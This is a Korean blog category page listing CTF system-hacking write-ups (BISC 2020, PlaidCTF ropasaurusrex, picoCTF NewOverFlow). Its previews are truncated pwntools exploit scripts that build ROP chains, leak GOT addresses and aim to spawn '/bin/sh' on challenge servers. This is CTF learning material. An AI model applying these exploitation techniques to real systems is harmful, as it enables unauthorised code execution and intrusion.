목록시스템 해킹/CTF (26)

ii4gsp

BISC 2020 CTF - oldschool

from pwn import * r = remote('bisc.lordofpwn.kr', 1473) e = ELF('./oldschool') libc = ELF('./libc32.so.6') read_plt = e.plt['read'] read_got = e.got['read'] puts_plt = e.plt['puts'] bss = e.bss() binsh = "/bin/sh\x00" pppr = 0x08048719 def exploit(addr, arg1, arg2, arg3): payload = '' payload += p32(addr) payload += p32(pppr) payload += p32(arg1) payload += p32(arg2) payload += p32(arg3) return ..
시스템 해킹/CTF 2020. 11. 28. 20:47
정보보호올림피아드 예선 Q2

from pwn import * r = remote('1.209.148.228', 7677) e = ELF('./bomberman') def makeThread(): print r.sendlineafter('>', '1') def removeBomb(): print r.sendlineafter('>', '4') print r.sendlineafter('Length : ', '10') print r.sendlineafter('Color : ', 'rainbow') def showFlag(): print r.sendlineafter('>', '6') print r.recv() makeThread() makeThread() makeThread() makeThread() makeThread() makeThrea..
시스템 해킹/CTF 2020. 9. 26. 18:03
HSCTF 6 - return-to-sender

보호되어 있는 글입니다.
시스템 해킹/CTF 2020. 3. 17. 20:27
HSCTF 6 - byte

보호되어 있는 글입니다.
시스템 해킹/CTF 2020. 3. 17. 20:23
[PlaidCTF 2013] ropasaurusrex

from pwn import * p = process('./ropasaurusrex') e = ELF('./ropasaurusrex') libc = e.libc pppr = 0x080484b6 payload = '' payload += '\x90' * (0x88 + 4) payload += p32(e.plt['write']) + p32(pppr) + p32(1) + p32(e.got['read']) + p32(4) payload += p32(e.plt['read']) + p32(pppr) + p32(0) + p32(e.bss()) + p32(8) payload += p32(e.plt['read']) + p32(pppr) + p32(0) + p32(e.got['read']) + p32(4) payload ..
시스템 해킹/CTF 2020. 3. 13. 19:12
picoCTF - NewOverFlow-2

#include #include #include #include #include #include #define BUFFSIZE 64 #define FLAGSIZE 64 bool win1 = false; bool win2 = false; void win_fn1(unsigned int arg_check) { if (arg_check == 0xDEADBEEF) { win1 = true; } } void win_fn2(unsigned int arg_check1, unsigned int arg_check2, unsigned int arg_check3) { if (win1 && \ arg_check1 == 0xBAADCAFE && \ arg_check2 == 0xCAFEBABE && \ arg_check3 == 0..
시스템 해킹/CTF 2020. 3. 10. 20:19
picoCTF - NewOverFlow-1

64bit 바이너리이다. main()함수에서 vuln()함수를 호출한다. vuln()함수에서 gets()함수로 v1에 입력을받는다. v1은 rbp-40에 위치한다. v1 ~ sfp = 64 v1 ~ ret = 72 72byte dummy를 주고 ret를 flag()함수로 조작해주면 된다. from pwn import * s = ssh(host = '2019shell1.picoctf.com', user = '', password = '') s.set_working_directory('/problems/newoverflow-1_4_3fc8f7e1553d8d36ded1be37c306f3a4') p = s.process('./vuln') e = ELF('/home/ii4gsp/picoCTF/vuln') flag..
시스템 해킹/CTF 2020. 3. 10. 20:00
picoCTF - CanaRy

보호되어 있는 글입니다.
시스템 해킹/CTF 2020. 3. 10. 19:59
Prev 1 2 3 4 Next